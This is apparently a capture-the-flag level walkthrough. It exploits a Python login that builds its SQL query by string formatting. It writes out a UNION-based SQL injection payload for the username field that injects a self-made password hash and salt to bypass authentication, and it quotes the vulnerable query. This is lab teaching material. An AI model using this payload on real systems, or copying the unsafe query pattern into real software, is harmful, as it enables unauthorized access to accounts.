Here is a python level. They claim this one is more secure and it is a bit more but not really.
There really is no hint given other then in the code
So take a look at line #86
query = """SELECT id, password_hash, salt FROM users
WHERE username = '{0}' LIMIT 1""".format(username)
cursor.execute(query)
So that is taking a username and pulling out data to see if the user/password combo is correct. The main issue is they aren't checking for invalid input. Like putting in quotes for the username.
So we are going to attack this with a SQL injection attack. Since there isn’t any validating of data that is sent in via the username we can put SQL in the username to make it pull out data that we want. So we can do this with a UNION statement. Pretty much our attack will be to union data we provide so it overrides the data that is in the database. So first we have to create a salted password to use. So lets first up python and do something like this
import hashlib
hashlib.sha256(“bob”+”bob”)
hashlib.sha256(“bob”+”bob”).hexdigest()
‘4c26991843b5498e99ef26e6cf45c4eecd9e6890436f619054aaa8790b35967c’
So what we are doing is creating our own salted password to pass in via SQL injection to the app so it can compare with a password we send in via the form and a salt we are also injecting. So once we have that encrypted password and a known salt/password we will enter the following
As the username
‘ UNION SELECT id, ‘4c26991843b5498e99ef26e6cf45c4eecd9e6890436f619054aaa8790b35967c’ AS password_hash, ‘bob’ AS salt FROM users where username=’bob’;–
As the password
bob
So that will take id,password_hash and salt and replace it in the code with what the database would return when select a user bob.
Now you have the next level’s password.